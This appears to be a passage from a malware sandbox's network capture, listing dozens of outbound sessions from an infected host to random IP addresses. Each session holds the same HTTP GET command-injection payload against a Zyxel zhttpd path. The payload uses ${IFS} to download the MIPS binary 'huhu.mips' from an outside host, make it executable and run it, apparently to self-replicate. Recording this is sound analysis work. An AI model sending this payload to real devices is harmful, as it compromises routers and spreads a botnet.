                                                Jan 29, 2024 07:08:00.592649937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7526192.168.2.2349648130.89.237.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592715025 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7527192.168.2.2347198126.8.59.30443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592725992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7528192.168.2.235109258.185.206.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592806101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7529192.168.2.234175864.72.203.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592847109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7530192.168.2.2339844223.180.193.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592881918 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7531192.168.2.234472438.113.189.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592925072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7532192.168.2.2333244169.9.105.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.592957020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7533192.168.2.2341190195.92.22.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593013048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7534192.168.2.2336974220.7.35.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593017101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7535192.168.2.2340112147.36.22.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593074083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7536192.168.2.2341750133.2.213.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593111992 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7537192.168.2.234996023.157.194.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593170881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7538192.168.2.2341346178.29.85.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593213081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7539192.168.2.234565662.186.100.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593250036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7540192.168.2.2350128115.98.31.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593305111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7541192.168.2.2347088216.116.57.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593332052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7542192.168.2.2341764145.80.165.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593383074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7543192.168.2.2354186206.128.62.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593449116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7544192.168.2.234582059.252.88.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593461037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7545192.168.2.2337008138.95.4.109443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593530893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7546192.168.2.233345219.177.7.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593590021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7547192.168.2.234636251.79.250.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593620062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7548192.168.2.2343178109.206.34.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593648911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7549192.168.2.2342652148.68.103.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593713045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7550192.168.2.234324236.181.137.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593748093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7551192.168.2.2341888196.117.158.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593800068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7552192.168.2.235883641.44.216.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593828917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7553192.168.2.233971885.254.152.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593858004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7554192.168.2.235904874.58.200.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593902111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7555192.168.2.2337558145.6.36.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593914986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7556192.168.2.2359780111.111.212.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593975067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7557192.168.2.2344698132.4.182.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.593993902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7558192.168.2.23537648.31.10.221443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594050884 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7559192.168.2.2351656191.156.147.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594088078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7560192.168.2.234897062.33.52.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594137907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7561192.168.2.2340018177.206.200.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594177961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7562192.168.2.2334706165.180.112.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594221115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7563192.168.2.2342330114.160.215.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594240904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7564192.168.2.2343100216.11.40.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594310045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7565192.168.2.2340798133.114.100.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594326019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7566192.168.2.23332645.34.150.56443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594366074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7567192.168.2.234989891.219.122.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594429016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7568192.168.2.235140894.85.239.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594468117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7569192.168.2.2347786163.72.235.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594479084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7570192.168.2.2345052192.177.48.5443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594578981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7571192.168.2.2345592166.117.22.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594594955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7572192.168.2.2360626163.131.192.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594598055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7573192.168.2.233327095.171.52.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594634056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7574192.168.2.2357308173.217.216.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594743013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7575192.168.2.2358906118.247.233.139443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594743013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7576192.168.2.234029225.49.57.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594763994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7577192.168.2.2333518173.204.88.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594854116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7578192.168.2.235828881.97.121.84443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594918013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7579192.168.2.233407648.148.158.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594919920 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7580192.168.2.2349396180.117.95.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594970942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7581192.168.2.2348536177.7.132.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.594997883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7582192.168.2.233806236.218.154.155443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595031023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7583192.168.2.2346514192.189.72.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595072031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7584192.168.2.235925057.75.161.52443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595123053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7585192.168.2.2357234111.212.59.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595172882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7586192.168.2.2344564221.180.184.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595204115 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7587192.168.2.2338058157.36.200.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595264912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7588192.168.2.235095649.121.234.148443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:08:00.595297098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7589192.168.2.2339390216.243.240.53443
                                                TimestampBytes transferredDirectionData
